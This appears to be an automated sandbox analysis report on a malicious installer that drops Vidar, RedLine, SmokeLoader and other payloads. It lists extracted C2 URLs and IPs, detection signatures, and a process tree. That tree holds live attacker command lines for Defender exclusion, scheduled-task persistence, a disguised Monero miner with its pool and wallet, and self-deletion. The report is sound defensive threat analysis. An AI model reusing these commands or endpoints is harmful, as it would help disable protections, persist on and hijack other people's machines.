Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
40s -
max time network
639s -
platform
windows10_x64 -
resource
win10-en -
submitted
20-09-2021 04:42
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
vidar
40.7
706
https://petrenko96.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
janesam
65.108.20.195:6774
Extracted
redline
199qwe
185.215.113.104:18754
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5048 3616 rundll32.exe 10 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4580 3616 rundll32.exe 10 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7992 3616 rundll32.exe 10 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8168 3616 rundll32.exe 10 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral8/memory/3832-248-0x00000000058B0000-0x00000000058CD000-memory.dmp family_redline behavioral8/memory/4964-318-0x000000000041C5DA-mapping.dmp family_redline behavioral8/memory/5604-386-0x000000000041C5E2-mapping.dmp family_redline behavioral8/memory/4780-453-0x000000000041C5DE-mapping.dmp family_redline behavioral8/memory/4964-313-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral8/files/0x000400000001ab2c-165.dat family_socelars behavioral8/files/0x000400000001ab2c-142.dat family_socelars -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral8/memory/4008-229-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar behavioral8/memory/4008-235-0x0000000000A40000-0x0000000000B14000-memory.dmp family_vidar -
resource yara_rule behavioral8/files/0x000500000001ab20-126.dat aspack_v212_v242 behavioral8/files/0x000400000001ab25-130.dat aspack_v212_v242 behavioral8/files/0x000400000001ab25-129.dat aspack_v212_v242 behavioral8/files/0x000500000001ab20-125.dat aspack_v212_v242 behavioral8/files/0x000400000001ab21-123.dat aspack_v212_v242 behavioral8/files/0x000400000001ab21-124.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
pid Process 3940 setup_installer.exe 644 setup_install.exe 3736 Sun19262b9e49ad.exe 3996 Sun1917b8fb5f09db8.exe 3580 Sun193fda712d9f1.exe 3312 Sun1908b94df837b3158.exe 3380 Sun1905815e51282417.exe 3432 Sun19e4ade31b2a.exe 4008 Sun19eb40faaaa9.exe 3832 Sun195a1614ec24e6a.exe 776 Sun19de8ff4b6aefeb8.exe 2540 Sun198361825f4.exe 3836 Sun1966fb31dd5a07.exe 4048 Sun1966fb31dd5a07.tmp -
Loads dropped DLL 6 IoCs
pid Process 644 setup_install.exe 644 setup_install.exe 644 setup_install.exe 644 setup_install.exe 644 setup_install.exe 4048 Sun1966fb31dd5a07.tmp -
resource yara_rule behavioral8/files/0x000400000001ab5b-250.dat themida behavioral8/files/0x000400000001ab5b-253.dat themida behavioral8/files/0x000400000001ab66-319.dat themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 295 ipinfo.io 296 ipinfo.io 5 ip-api.com 90 ipinfo.io 91 ipinfo.io 192 ipinfo.io 193 ipinfo.io 216 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 19 IoCs
pid pid_target Process procid_target 4452 776 WerFault.exe 93 5416 776 WerFault.exe 93 6044 1940 WerFault.exe 118 5412 776 WerFault.exe 93 5320 4104 WerFault.exe 119 2200 776 WerFault.exe 93 5812 4104 WerFault.exe 119 5784 776 WerFault.exe 93 1452 776 WerFault.exe 93 5208 4104 WerFault.exe 119 2984 776 WerFault.exe 93 2528 4956 WerFault.exe 109 1452 4104 WerFault.exe 119 5416 776 WerFault.exe 93 3736 4104 WerFault.exe 119 6544 776 WerFault.exe 93 3532 4104 WerFault.exe 119 6324 776 WerFault.exe 93 6316 776 WerFault.exe 93 -
Creates scheduled task(s) 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 9484 schtasks.exe 5552 schtasks.exe 10152 schtasks.exe 7180 schtasks.exe 8928 schtasks.exe 7212 schtasks.exe 8392 schtasks.exe 4088 schtasks.exe 7172 schtasks.exe 8132 schtasks.exe 4848 schtasks.exe 5224 schtasks.exe 7952 schtasks.exe 9632 schtasks.exe 9268 schtasks.exe 7780 schtasks.exe 9652 schtasks.exe 5920 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 4524 timeout.exe 7544 timeout.exe 7944 timeout.exe 6000 timeout.exe 68 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 8104 taskkill.exe 4820 taskkill.exe 9884 taskkill.exe 5984 taskkill.exe 6128 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3520 cmd.exe 3520 cmd.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeCreateTokenPrivilege 3736 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 3736 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 3736 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 3736 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 3736 Sun19262b9e49ad.exe Token: SeTcbPrivilege 3736 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 3736 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 3736 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 3736 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 3736 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 3736 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 3736 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 3736 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 3736 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 3736 Sun19262b9e49ad.exe Token: SeBackupPrivilege 3736 Sun19262b9e49ad.exe Token: SeRestorePrivilege 3736 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 3736 Sun19262b9e49ad.exe Token: SeDebugPrivilege 3736 Sun19262b9e49ad.exe Token: SeAuditPrivilege 3736 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 3736 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 3736 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 3736 Sun19262b9e49ad.exe Token: SeUndockPrivilege 3736 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 3736 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 3736 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 3736 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 3736 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 3736 Sun19262b9e49ad.exe Token: 31 3736 Sun19262b9e49ad.exe Token: 32 3736 Sun19262b9e49ad.exe Token: 33 3736 Sun19262b9e49ad.exe Token: 34 3736 Sun19262b9e49ad.exe Token: 35 3736 Sun19262b9e49ad.exe Token: SeDebugPrivilege 3432 Sun19e4ade31b2a.exe Token: SeDebugPrivilege 3520 cmd.exe Token: SeDebugPrivilege 3832 Sun195a1614ec24e6a.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3668 wrote to memory of 3940 3668 setup_x86_x64_install.exe 69 PID 3668 wrote to memory of 3940 3668 setup_x86_x64_install.exe 69 PID 3668 wrote to memory of 3940 3668 setup_x86_x64_install.exe 69 PID 3940 wrote to memory of 644 3940 setup_installer.exe 70 PID 3940 wrote to memory of 644 3940 setup_installer.exe 70 PID 3940 wrote to memory of 644 3940 setup_installer.exe 70 PID 644 wrote to memory of 1556 644 setup_install.exe 73 PID 644 wrote to memory of 1556 644 setup_install.exe 73 PID 644 wrote to memory of 1556 644 setup_install.exe 73 PID 644 wrote to memory of 1660 644 setup_install.exe 92 PID 644 wrote to memory of 1660 644 setup_install.exe 92 PID 644 wrote to memory of 1660 644 setup_install.exe 92 PID 644 wrote to memory of 1852 644 setup_install.exe 74 PID 644 wrote to memory of 1852 644 setup_install.exe 74 PID 644 wrote to memory of 1852 644 setup_install.exe 74 PID 644 wrote to memory of 1860 644 setup_install.exe 75 PID 644 wrote to memory of 1860 644 setup_install.exe 75 PID 644 wrote to memory of 1860 644 setup_install.exe 75 PID 644 wrote to memory of 1700 644 setup_install.exe 91 PID 644 wrote to memory of 1700 644 setup_install.exe 91 PID 644 wrote to memory of 1700 644 setup_install.exe 91 PID 644 wrote to memory of 2164 644 setup_install.exe 90 PID 644 wrote to memory of 2164 644 setup_install.exe 90 PID 644 wrote to memory of 2164 644 setup_install.exe 90 PID 644 wrote to memory of 2376 644 setup_install.exe 76 PID 644 wrote to memory of 2376 644 setup_install.exe 76 PID 644 wrote to memory of 2376 644 setup_install.exe 76 PID 644 wrote to memory of 2496 644 setup_install.exe 77 PID 644 wrote to memory of 2496 644 setup_install.exe 77 PID 644 wrote to memory of 2496 644 setup_install.exe 77 PID 644 wrote to memory of 2752 644 setup_install.exe 78 PID 644 wrote to memory of 2752 644 setup_install.exe 78 PID 644 wrote to memory of 2752 644 setup_install.exe 78 PID 644 wrote to memory of 2820 644 setup_install.exe 79 PID 644 wrote to memory of 2820 644 setup_install.exe 79 PID 644 wrote to memory of 2820 644 setup_install.exe 79 PID 644 wrote to memory of 3468 644 setup_install.exe 80 PID 644 wrote to memory of 3468 644 setup_install.exe 80 PID 644 wrote to memory of 3468 644 setup_install.exe 80 PID 644 wrote to memory of 3044 644 setup_install.exe 81 PID 644 wrote to memory of 3044 644 setup_install.exe 81 PID 644 wrote to memory of 3044 644 setup_install.exe 81 PID 1556 wrote to memory of 3520 1556 cmd.exe 88 PID 1556 wrote to memory of 3520 1556 cmd.exe 88 PID 1556 wrote to memory of 3520 1556 cmd.exe 88 PID 1852 wrote to memory of 3736 1852 cmd.exe 87 PID 1852 wrote to memory of 3736 1852 cmd.exe 87 PID 1852 wrote to memory of 3736 1852 cmd.exe 87 PID 1660 wrote to memory of 3996 1660 cmd.exe 82 PID 1660 wrote to memory of 3996 1660 cmd.exe 82 PID 1660 wrote to memory of 3996 1660 cmd.exe 82 PID 644 wrote to memory of 2128 644 setup_install.exe 86 PID 644 wrote to memory of 2128 644 setup_install.exe 86 PID 644 wrote to memory of 2128 644 setup_install.exe 86 PID 1860 wrote to memory of 3580 1860 cmd.exe 83 PID 1860 wrote to memory of 3580 1860 cmd.exe 83 PID 2164 wrote to memory of 3312 2164 cmd.exe 84 PID 2164 wrote to memory of 3312 2164 cmd.exe 84 PID 2164 wrote to memory of 3312 2164 cmd.exe 84 PID 3468 wrote to memory of 3380 3468 cmd.exe 85 PID 3468 wrote to memory of 3380 3468 cmd.exe 85 PID 3468 wrote to memory of 3380 3468 cmd.exe 85 PID 1700 wrote to memory of 3432 1700 cmd.exe 89 PID 1700 wrote to memory of 3432 1700 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:3520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3736 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:5752
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:5984
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
PID:3580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵PID:2376
-
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵
- Executes dropped EXE
PID:776 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 6566⤵
- Program crash
PID:4452
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 6726⤵
- Program crash
PID:5416
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 7846⤵
- Program crash
PID:5412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 8886⤵
- Program crash
PID:2200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 6606⤵
- Program crash
PID:5784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 8926⤵
- Program crash
PID:1452
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 11886⤵
- Program crash
PID:2984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 12046⤵
- Program crash
PID:5416
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 11366⤵
- Program crash
PID:6544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 12846⤵
- Program crash
PID:6324
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 12766⤵
- Program crash
PID:6316
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵PID:2496
-
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵PID:4328
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:4740
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:400
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3368
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:5224
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:6060
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:5236
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:5556
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:4088
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:6056
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:2984
-
C:\ProgramData\740397.exe"C:\ProgramData\740397.exe"8⤵PID:2420
-
-
C:\ProgramData\8671304.exe"C:\ProgramData\8671304.exe"8⤵PID:4344
-
-
C:\ProgramData\7991907.exe"C:\ProgramData\7991907.exe"8⤵PID:5856
-
C:\ProgramData\7991907.exe"C:\ProgramData\7991907.exe"9⤵PID:4780
-
-
-
C:\ProgramData\4072419.exe"C:\ProgramData\4072419.exe"8⤵PID:5304
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:1940
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1940 -s 15328⤵
- Program crash
PID:6044
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:4104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 8088⤵
- Program crash
PID:5320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 8128⤵
- Program crash
PID:5812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 8848⤵
- Program crash
PID:5208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 9728⤵
- Program crash
PID:1452
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 8648⤵
- Program crash
PID:3736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 10488⤵
- Program crash
PID:3532
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:5276
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵PID:5360
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:5992
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵PID:5516
-
C:\Users\Admin\AppData\Local\Temp\tmp7390_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp7390_tmp.exe"8⤵PID:5480
-
C:\Users\Admin\AppData\Local\Temp\tmp7390_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp7390_tmp.exe9⤵PID:6424
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:5672
-
C:\Users\Admin\AppData\Local\Temp\is-5DUNN.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-5DUNN.tmp\setup_2.tmp" /SL5="$9007E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\is-D0PRP.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-D0PRP.tmp\setup_2.tmp" /SL5="$202A0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:4264
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:5916
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:5960
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:6056
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵PID:2752
-
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵
- Executes dropped EXE
PID:4008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Sun19eb40faaaa9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun19eb40faaaa9.exe" & del C:\ProgramData\*.dll & exit6⤵PID:4744
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Sun19eb40faaaa9.exe /f7⤵
- Kills process with taskkill
PID:6128
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:4524
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵PID:2820
-
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
PID:2540 -
C:\Users\Admin\AppData\Local\Temp\tmpDB28_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpDB28_tmp.exe"6⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\tmpDB28_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpDB28_tmp.exe7⤵PID:5384
-
-
C:\Users\Admin\AppData\Local\Temp\tmpDB28_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpDB28_tmp.exe7⤵PID:5604
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵
- Executes dropped EXE
PID:3380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵PID:3044
-
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵PID:2128
-
C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵
- Executes dropped EXE
PID:3836 -
C:\Users\Admin\AppData\Local\Temp\is-C08AO.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-C08AO.tmp\Sun1966fb31dd5a07.tmp" /SL5="$4004E,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS46FD7D81\Sun1966fb31dd5a07.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4048 -
C:\Users\Admin\AppData\Local\Temp\is-JAQSR.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-JAQSR.tmp\Ze2ro.exe" /S /UID=burnerch27⤵PID:4248
-
C:\Program Files\Mozilla Firefox\XXLASHTZFR\ultramediaburner.exe"C:\Program Files\Mozilla Firefox\XXLASHTZFR\ultramediaburner.exe" /VERYSILENT8⤵PID:6268
-
C:\Users\Admin\AppData\Local\Temp\is-UR97I.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-UR97I.tmp\ultramediaburner.tmp" /SL5="$10410,281924,62464,C:\Program Files\Mozilla Firefox\XXLASHTZFR\ultramediaburner.exe" /VERYSILENT9⤵PID:6472
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:7076
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cf-3fc67-681-7bdaa-b47f808fc4537\Ceryguraezhae.exe"C:\Users\Admin\AppData\Local\Temp\cf-3fc67-681-7bdaa-b47f808fc4537\Ceryguraezhae.exe"8⤵PID:6460
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1kvw1dc2.fqj\GcleanerEU.exe /eufive & exit9⤵PID:2268
-
